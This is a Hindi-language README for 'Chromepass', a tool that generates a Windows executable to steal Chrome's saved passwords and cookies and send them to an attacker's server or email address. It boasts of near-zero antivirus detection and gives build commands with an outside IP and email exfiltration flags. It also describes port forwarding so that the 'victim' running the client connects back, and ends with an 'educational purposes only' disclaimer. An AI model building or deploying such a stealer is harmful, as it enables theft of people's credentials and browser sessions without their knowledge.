
Chromepass - Chrome में सहेजे गए पासवर्ड हैक करना
डेमो देखें
·
बग रिपोर्ट करें
·
सुविधा का अनुरोध करें
Chromepass एक पायथन-आधारित कंसोल एप्लिकेशन है जो निम्नलिखित सुविधाओं के साथ एक विंडोज निष्पादन योग्य फ़ाइल उत्पन्न करता है:
नई क्लाइंट बिल्ड पद्धति व्यावहारिक रूप से 0% पहचान दर सुनिश्चित करती है, भले ही AV-चोरी की रणनीति का उपयोग न किया जाए। यदि भविष्य में यह झूठा हो जाता है, तो AV चोरी में सुधार के लिए कुछ विधियाँ लागू की जाएँगी।
नवीनतम स्कैन का एक उदाहरण (नोट: 10-12 घंटों के भीतर हम 0-2 डिटेक्शन से 32 डिटेक्शन तक पहुँच जाते हैं, इसलिए अपने स्वयं के बिल्ड का विश्लेषण चलाएँ):
यह एक बहुत ही सरल एप्लिकेशन है, जो केवल उपयोग करता है:
स्थापना को Windows VM के अंदर करने की अनुशंसा की जाती है। स्थापना प्रक्रिया के कुछ भाग मौजूदा कॉन्फ़िगरेशन से प्रभावित हो सकते हैं। इसका परीक्षण एक साफ़ Windows 10 VM पर किया गया था।
Chromepass को संकलित करने के लिए Windows की आवश्यकता है! Linux और macOS के लिए समर्थन जल्द ही जोड़ा जा सकता है।
git clone https://github.com/darkarp/chromepass
नोट: रिपॉजिटरी को क्लोन करने के विकल्प के रूप में, आप नवीनतम रिलीज़ डाउनलोड कर सकते हैं, क्योंकि रिपॉजिटरी में अधिक बग हो सकते हैं।
निर्भरताएँ स्वचालित रूप से जाँची और स्थापित की जाती हैं, इसलिए आप बस उपयोग पर जा सकते हैं। यह अनुशंसित है कि आप एक साफ़ VM का उपयोग करें, ताकि कोई विरोध न हो।
यदि आपके पास निर्भरताएँ नहीं हैं और आपका इंटरनेट तेज़ नहीं है, तो इसमें कुछ समय लगेगा। कुछ कॉफ़ी ले आएँ।
Chromepass बहुत सीधा है। शुरू करें:
python create.py -h
विकल्पों की एक सूची दिखाई देगी और वे स्व-व्याख्यात्मक हैं।
बिना किसी पैरामीटर के चलाने पर 127.0.0.1 से जुड़ने वाला सर्वर और क्लाइंट बनेगा।
बिल्ड का एक सरल उदाहरण:
python create.py --ip 92.34.11.220 --error --message 'एक त्रुटि हुई है'
सर्वर और क्लाइंट बनाने के बाद, सुनिश्चित करें कि क्लाइंट चलने पर सर्वर चल रहा हो।
कुकीज़ और पासवर्ड JSON फ़ाइलों में data नामक नई फ़ोल्डर में सर्वर के समान निर्देशिका में, IP पते के अनुसार अलग-अलग सहेजे जाएँगे।
Chromepass फ़ाइलों को ईमेल के माध्यम से भेजने का समर्थन करता है, हालाँकि यह अभी भी प्रायोगिक है।
इसे सक्षम करने के लिए, आप सर्वर बनाते समय --email फ़्लैग का उपयोग कर सकते हैं। आपको दो चीज़ों की आवश्यकता होगी: एक उपयोगकर्ता नाम (आपका ईमेल) और एक पासवर्ड (एक ऐप पासवर्ड)।
ऐप पासवर्ड उत्पन्न करने के लिए आपको अपनी खाता सेटिंग -> सुरक्षा में जाना होगा और दो-चरणीय प्रमाणीकरण सक्षम करना होगा (आवश्यक!)
दो-चरणीय प्रमाणीकरण सक्षम होने के बाद, आपको ऐप पासवर्ड नामक एक नया विकल्प दिखाई देगा:

आप वहाँ क्लिक करना चाहते हैं और फिर उपयुक्त विकल्प चुनें और फिर एक पासवर्ड उत्पन्न करें:

Generate पर क्लिक करने के बाद यह आवश्यक पासवर्ड देगा।
आप उपयोगकर्ता नाम और पासवर्ड का उपयोग सीधे कमांड में कर सकते हैं या बस इसे config.ini में डाल सकते हैं, जहाँ YOUR_USERNAME और YOUR_PASSWORD लिखा है।
python create.py --error --message 'एक त्रुटि हुई है' --email --username [email protected] --password qwertyuiopasdfghh
python create.py --error --message 'एक त्रुटि हुई है' --email
यदि आप इसे दूरस्थ परिदृश्य में उपयोग करना चाहते हैं, तो आपको पोर्ट फ़ॉरवर्डिंग (डिफ़ॉल्ट रूप से पोर्ट 80) भी करनी होगी, ताकि जब पीड़ित क्लाइंट चलाए तो वह सही पोर्ट पर सर्वर से कनेक्ट हो सके।
अधिक सामान्य जानकारी के लिए, यहाँ क्लिक करें here. यदि आप अभी भी संतुष्ट नहीं हैं, तो गूगल पर खोजें।
स्वचालित सेटअप प्रायोगिक है। किसी न किसी कारण से, सेटअप निर्भरताओं को सही ढंग से स्थापित करने में विफल हो सकता है। यदि ऐसा है, तो आपको उन्हें मैन्युअल रूप से स्थापित करना होगा।
सौभाग्य से, केवल 2 निर्भरताएँ हैं:
बिल्ड टूल के बजाय आप विज़ुअल स्टूडियो भी स्थापित कर सकते हैं लेकिन इसमें अधिक स्थान लगेगा।
बिल्ड टूल को सफलतापूर्वक स्थापित करने के बाद, आप Rustup की वेबसाइट से rustup-init.exe चला सकते हैं।
इससे आवश्यक निर्भरताएँ पूरी हो जाती हैं और आप आगे बढ़ सकते हैं।
यदि आपको कोई त्रुटि या बग मिलता है, तो कृपया इसे एक मुद्दे के रूप में रिपोर्ट करें। यदि आप कोई सुविधा या सुधार सुझाना चाहते हैं, तो कृपया इसे मुद्दा पृष्ठों पर रिपोर्ट करें।
कृपया मुद्दा बनाते समय दिखाए गए टेम्पलेट का पालन करें।
महत्वाकांक्षी कंप्यूटर सुरक्षा विशेषज्ञों के एक समुदाय तक पहुँच के लिए, पूर्ण शुरुआती से लेकर अनुभवी दिग्गज तक, हमारे Discord सर्वर से जुड़ें: WhiteHat Hacking
यदि आप मुझसे संपर्क करना चाहते हैं, तो आप इसके माध्यम से कर सकते हैं: [email protected]
मैं आपके द्वारा प्रदान की गई जानकारी और कोड के उपयोग के लिए जिम्मेदार नहीं हूँ। यह केवल पेशेवर या शैक्षिक उद्देश्यों के लिए है।
